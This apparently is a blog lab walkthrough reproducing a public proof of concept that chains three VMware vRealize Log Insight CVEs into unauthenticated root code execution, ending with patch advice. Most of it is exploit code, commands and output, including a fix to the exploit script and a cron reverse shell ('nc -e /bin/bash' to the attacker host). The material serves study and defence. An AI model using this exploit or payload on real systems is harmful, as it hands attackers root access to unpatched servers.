On 31 January 2023, security researcher James Horman and team from Horizon3.ai published a Technical Deep Dive on vulnerabilities that exist in VMware vRealize Log Insight and how to exploit those to get unauthenticated remote access to the application. Please read the blog VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive for all the technical details.

What makes this use case particular interested is the chaining of multiple vulnerabilities to achieve the unauthenticated RCE.
Basically there are four vulnerabilities that are published in the VMware VMSA-2023-0001 security disclosure:

• CVE-2022-31706: VMware vRealize Log Insight Directory Traversal Vulnerability
  
• CVE-2022-31704: VMware vRealize Log Insight broken Access Control Vulnerability
  
• CVE-2022-31710: VMware vRealize Log Insight Deserialization Vulnerability
  
• CVE-2022-31711: VMware vRealize Log Insight Information Disclosure Vulnerability
  

The analysis shows that three vulnerabilities CVE-2022-31706, CVE-2022-31704 and CVE-2022-31711 are chained to achieve the RCE.

In a nutshell:

1. CVE-2022-31704 is used to gain unauthorized access to the Apache Thrift server to execute commands. Apache Thrift is a RPC framework that allows client/server communication and is typically used to establish communication between components of the system.
   
2. The Apache Thrift server in the VMware vRealize Log Insight application is vulnerable and can be accessed with a client to execute specific commands defined in the framework.
   
3. In this scenario, two RPC commands are being exploited, remotePakDownloadCommand and pakUpgradeCommand that allows for an unauthenticated upload of a malicious PAK file with an attached payload that can be extracted to any place on the filesystem using CVE-2022-31706 that allows for Directory Traversal.
   
4. Last but not least, the remotePakDownloadCommand requires a node token to work. A node token is a guid that is unique per instance of Log Insight. This information is not readily available to an unauthenticated user. However, there are various Thrift RPC commands that leak the node token including getConfig and getHealthStatus, which links back to the third CVE-2022-31711 – VMware vRealize Log Insight Information Disclosure Vulnerability.
   

Now let’s see in real-life practice, how this vulnerability works…

First we need install a vulnerable instance of VMware vRealize Log Insight, which you can download from this link.
You need to be registered as a customer or you can apply for a trial license before you can download the OVA.
Import the OVA in your favorite hypervisor application. I am using Oracle VirtualBox.
Please allocate enough memory and CPU (minimal 4 GB and 2 vCPU) otherwise your appliance will be dead slow and the exploit will fail due to lack of space in the /tmp directory.

Go thru the setup of the appliance. This is all very straight forward.
If you have the appliance running, go to the POC at Github that has been created by the Horizon3.ai team.
Clone the repository.
Before you start executing the exploit, please install Thrift python support.

#  pip3 install thrift

and install the thrift-compiler.
Not needed for the exploit to work but it gives you the ability to generate thrift modules for other languages such as ruby.

# apt install thrift-compiler

The last thing that you need to do is to correct a small typo that the guys from Horizon3.ai made in their code.
Yeah, everybody makes mistakes, even these guys ;–)

Open VMSA-2023-0001.py with your favorite editor and go to the section below.

def remote_pak_download(client, node_token, http_server_address, http_server_port):
    command = Command()
    command.commandType = 9

    download_command = RemotePakDownloadCommand()
    download_command.sourceNodeToken = node_token
    # The remote system does not return an error if this url is incorrect.
    # It just silently fails
    download_command.requestUrl = f"http://{http_server_address}:{http_server_port}/exploit.tar"
    download_command.fileName = "exploit.pak"

    command.remotePakDownloadCommand = download_command

Change download_command.fileName = "exploit" to download_command.fileName = "exploit.pak" and save the file.

Now we are ready to run the exploit against our installed target.

• The exploit will gain access by obtaining the token.
  
• Next, it will create a malicious PAK file with the payload attached that is a crontab file with a netcat command connecting back to your system.
  
• PAK file gets upload and extracted using the vulnerable Apache Thrift server running on the Log Insight server.
  
• Run a netcat listener on your system to catch the netcat connection from the target system triggered by the cron daemon after successful exploitation.
  

# python3 ./VMSA-2023-0001.py --target_address 192.168.100.92 --http_server_address 192.168.100.7 --http_server_port 1981 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: 8984be67-2394-4da1-bf87-2635d558329d
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.100.92 - - [03/Feb/2023 17:19:02] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered
# nc -lnvp 8888
listening on [any] 8888 ...
connect to [192.168.100.7] from (UNKNOWN) [192.168.100.92] 42746
uname -a
Linux localhost 4.19.245-1.ph3 #1-photon SMP Thu Jun 2 02:30:39 UTC 2022 x86_64 GNU/Linux
whoami
root
cat /etc/issue
VMware vRealize Log Insight
cat /etc/photon-release
VMware Photon OS 3.0
PHOTON_BUILD_NUMBER=05f9d3d8d

If you login into the appliance, you can find the exploit.pak in the /tmp directory and the a cron file exploit created in the /etc/cron.d directory.
If you check the contents of the PAK file, you will see the ../../etc/crond.d/exploit file with the directory traversal.

root@localhost [ ~ ]# ls -l /tmp/*.pak
-rw-r--r-- 1 root root 122880 Feb  3 17:18 /tmp/exploit.pak
root@localhost [ ~ ]# ls -l /etc/cron.d/exploit
-rw-r--r-- 1 root root 51 Feb  3 12:24 /etc/cron.d/exploit
root@localhost [ ~ ]# cat /etc/cron.d/exploit
* * * * * root nc -e /bin/bash 192.168.100.7 8888

root@localhost [ ~ ]# tar -tvf/tmp/exploit.pak
-rw-r--r-- root/root     35768 2023-02-03 09:10 upgrade-image-8.10.2-21145187.rpm
-rw-r--r-- root/root     35768 2023-02-03 09:10 upgrade-driver
-rw-r--r-- root/root     35768 2023-02-03 09:10 eula.txt
-rw-r--r-- root/root      1926 2023-02-03 09:10 VMware-vRealize-Log-Insight.cert
-rw-r--r-- root/root      1790 2023-02-03 09:10 VMware-vRealize-Log-Insight.mf
tar: Removing leading `../../' from member names
-rw-r--r-- root/root        51 2023-02-03 12:24 ../../etc/cron.d/exploit

The example above show that the exploit is pretty simple to weaponize and execute, however there is a low probability of exploitation in the wild.
The main reason is that VMware vRealize Log Insight is typically not exposed to the public Internet and the Thrift RPC ports 16520 through 16580 should be accessible for the exploit to work.
But from the inside, it is of course a very attractive target to exploit because it has tons of nice information on the network and servers ready to be disclosed to an attacker.

Mitigation

Please update VMware vRealize Log Insight to 8.10.2.

References

Horizon3.ai: VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive
VMware advisory
Horizon3.ai: POC

Credits

Credits goes to the security researchers below that analyzed the vulnerabilities and discovered the RCE chain.

• Horizon3Attack team
  
• James Horseman
  
• Zach Hanley